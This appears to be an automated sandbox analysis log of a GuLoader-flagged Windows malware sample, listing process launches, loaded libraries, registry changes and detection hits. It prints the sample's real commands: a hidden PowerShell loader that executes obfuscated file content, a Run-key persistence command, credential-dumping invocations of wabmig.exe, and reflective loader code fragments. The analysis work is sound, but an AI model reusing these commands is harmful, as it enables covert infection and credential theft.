            Source: wabmig.exe, wabmig.exe, 00000011.00000002.2456821504.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: SELECT 'DELETE FROM vacuum_db.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'
            Source: SecuriteInfo.com.FileRepMalware.12793.28433.exeReversingLabs: Detection: 47%
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.12793.28433.exeFile read: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.12793.28433.exeJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeEvasive API call chain: __getmainargs,DecisionNodes,exitgraph_18-33210
            Source: unknownProcess created: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.12793.28433.exe "C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.12793.28433.exe"
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.12793.28433.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -windowstyle hidden "$Semiexpositive=Get-Content 'C:\Users\user\AppData\Roaming\euthanasic\satineredes\Gammastraales\Skeletonlike.pas';$Folkedyb=$Semiexpositive.SubString(54300,3);.$Folkedyb($Semiexpositive)"
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files (x86)\Windows Mail\wabmig.exe "C:\Program Files (x86)\windows mail\wabmig.exe"
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Markedsandel" /t REG_EXPAND_SZ /d "%Rykningspaategningens% -windowstyle minimized $Unbaked=(Get-ItemProperty -Path 'HKCU:\kompositioner\').Batikker;%Rykningspaategningens% ($Unbaked)"
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Markedsandel" /t REG_EXPAND_SZ /d "%Rykningspaategningens% -windowstyle minimized $Unbaked=(Get-ItemProperty -Path 'HKCU:\kompositioner\').Batikker;%Rykningspaategningens% ($Unbaked)"
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeProcess created: C:\Program Files (x86)\Windows Mail\wabmig.exe "C:\Program Files (x86)\windows mail\wabmig.exe" /stext "C:\Users\user\AppData\Local\Temp\coqd"
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeProcess created: C:\Program Files (x86)\Windows Mail\wabmig.exe "C:\Program Files (x86)\windows mail\wabmig.exe" /stext "C:\Users\user\AppData\Local\Temp\nivooon"
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeProcess created: C:\Program Files (x86)\Windows Mail\wabmig.exe "C:\Program Files (x86)\windows mail\wabmig.exe" /stext "C:\Users\user\AppData\Local\Temp\xkahpgyvtl"
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.12793.28433.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -windowstyle hidden "$Semiexpositive=Get-Content 'C:\Users\user\AppData\Roaming\euthanasic\satineredes\Gammastraales\Skeletonlike.pas';$Folkedyb=$Semiexpositive.SubString(54300,3);.$Folkedyb($Semiexpositive)"Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files (x86)\Windows Mail\wabmig.exe "C:\Program Files (x86)\windows mail\wabmig.exe"Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Markedsandel" /t REG_EXPAND_SZ /d "%Rykningspaategningens% -windowstyle minimized $Unbaked=(Get-ItemProperty -Path 'HKCU:\kompositioner\').Batikker;%Rykningspaategningens% ($Unbaked)"Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeProcess created: C:\Program Files (x86)\Windows Mail\wabmig.exe "C:\Program Files (x86)\windows mail\wabmig.exe" /stext "C:\Users\user\AppData\Local\Temp\coqd"Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeProcess created: C:\Program Files (x86)\Windows Mail\wabmig.exe "C:\Program Files (x86)\windows mail\wabmig.exe" /stext "C:\Users\user\AppData\Local\Temp\nivooon"Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeProcess created: C:\Program Files (x86)\Windows Mail\wabmig.exe "C:\Program Files (x86)\windows mail\wabmig.exe" /stext "C:\Users\user\AppData\Local\Temp\xkahpgyvtl"Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Markedsandel" /t REG_EXPAND_SZ /d "%Rykningspaategningens% -windowstyle minimized $Unbaked=(Get-ItemProperty -Path 'HKCU:\kompositioner\').Batikker;%Rykningspaategningens% ($Unbaked)"Jump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.12793.28433.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.12793.28433.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.12793.28433.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.12793.28433.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.12793.28433.exeSection loaded: dwmapi.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.12793.28433.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.12793.28433.exeSection loaded: oleacc.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.12793.28433.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.12793.28433.exeSection loaded: shfolder.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.12793.28433.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.12793.28433.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.12793.28433.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.12793.28433.exeSection loaded: riched20.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.12793.28433.exeSection loaded: usp10.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.12793.28433.exeSection loaded: msls31.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.12793.28433.exeSection loaded: textinputframework.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.12793.28433.exeSection loaded: coreuicomponents.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.12793.28433.exeSection loaded: coremessaging.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.12793.28433.exeSection loaded: ntmarta.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.12793.28433.exeSection loaded: coremessaging.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.12793.28433.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.12793.28433.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.12793.28433.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.12793.28433.exeSection loaded: textshaping.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.12793.28433.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntmarta.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeSection loaded: edputil.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeSection loaded: windows.staterepositoryps.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeSection loaded: appresolver.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeSection loaded: bcp47langs.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeSection loaded: slc.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeSection loaded: sppc.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeSection loaded: onecorecommonproxystub.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeSection loaded: winnsi.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeSection loaded: schannel.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeSection loaded: mskeyprotect.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeSection loaded: ntasn1.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeSection loaded: dpapi.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeSection loaded: ncrypt.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeSection loaded: ncryptsslp.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeSection loaded: winmm.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeSection loaded: rstrtmgr.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeSection loaded: version.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeSection loaded: pstorec.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeSection loaded: vaultcli.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeSection loaded: dpapi.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeSection loaded: pstorec.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.12793.28433.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
            Source: Window RecorderWindow detected: More than 3 window changes detected
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\AccountsJump to behavior
            Source: SecuriteInfo.com.FileRepMalware.12793.28433.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
            Source: Binary string: qm.Core.pdb1 source: powershell.exe, 00000007.00000002.2404247837.0000000007602000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: tem.Core.pdb source: powershell.exe, 00000007.00000002.2404247837.0000000007602000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: mation.pdb source: powershell.exe, 00000007.00000002.2399932487.0000000002F9A000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: CallSite.Targetore.pdb source: powershell.exe, 00000007.00000002.2407709263.00000000087D7000.00000004.00000020.00020000.00000000.sdmp

            Data Obfuscation

            barindex
            Yara detected GuLoader
            Source: Yara matchFile source: 00000007.00000002.2408058471.000000000C4AF000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
            Found suspicious powershell code related to unpacking or dynamic code loading
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: GetDelegateForFunctionPointer((Lavvandstand $Sighed $Maspiter156), (Permistion @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))$global:Gynarchy = [AppDomain]::CurrentDomain.GetAssemblies()$globa
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName($Posy)), $Wappo).DefineDynamicModule($Syntaksfejlenes, $false).DefineType($Sekreter, $Bevisliggrelsers, [System.MulticastDelegate])$Nav
            Suspicious powershell command line found
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.12793.28433.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -windowstyle hidden "$Semiexpositive=Get-Content 'C:\Users\user\AppData\Roaming\euthanasic\satineredes\Gammastraales\Skeletonlike.pas';$Folkedyb=$Semiexpositive.SubString(54300,3);.$Folkedyb($Semiexpositive)"
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.12793.28433.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -windowstyle hidden "$Semiexpositive=Get-Content 'C:\Users\user\AppData\Roaming\euthanasic\satineredes\Gammastraales\Skeletonlike.pas';$Folkedyb=$Semiexpositive.SubString(54300,3);.$Folkedyb($Semiexpositive)"Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 17_2_004044A4 LoadLibraryW,GetProcAddress,FreeLibrary,MessageBoxW,17_2_004044A4
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 12_2_23232806 push ecx; ret 12_2_23232819
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 17_2_0044693D push ecx; ret 17_2_0044694D
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 17_2_0044DB70 push eax; ret 17_2_0044DB84
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 17_2_0044DB70 push eax; ret 17_2_0044DBAC
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 17_2_00451D54 push eax; ret 17_2_00451D61
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 18_2_0044B090 push eax; ret 18_2_0044B0A4
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 18_2_0044B090 push eax; ret 18_2_0044B0CC
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 18_2_00451D34 push eax; ret 18_2_00451D41
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 18_2_00444E71 push ecx; ret 18_2_00444E81
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 19_2_00414060 push eax; ret 19_2_00414074
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 19_2_00414060 push eax; ret 19_2_0041409C
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 19_2_00414039 push ecx; ret 19_2_00414049
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 19_2_004164EB push 0000006Ah; retf 19_2_004165C4
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 19_2_00416553 push 0000006Ah; retf 19_2_004165C4
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 19_2_00416555 push 0000006Ah; retf 19_2_004165C4
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\euthanasic\satineredes\Gammastraales\Ekspertenhed\plyndrer\SecuriteInfo.com.FileRepMalware.12793.28433.exeJump to dropped file
            Source: C:\Windows\SysWOW64\reg.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run MarkedsandelJump to behavior
            Source: C:\Windows\SysWOW64\reg.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run MarkedsandelJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 18_2_004047CB LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,18_2_004047CB
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.12793.28433.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.12793.28433.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.12793.28433.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
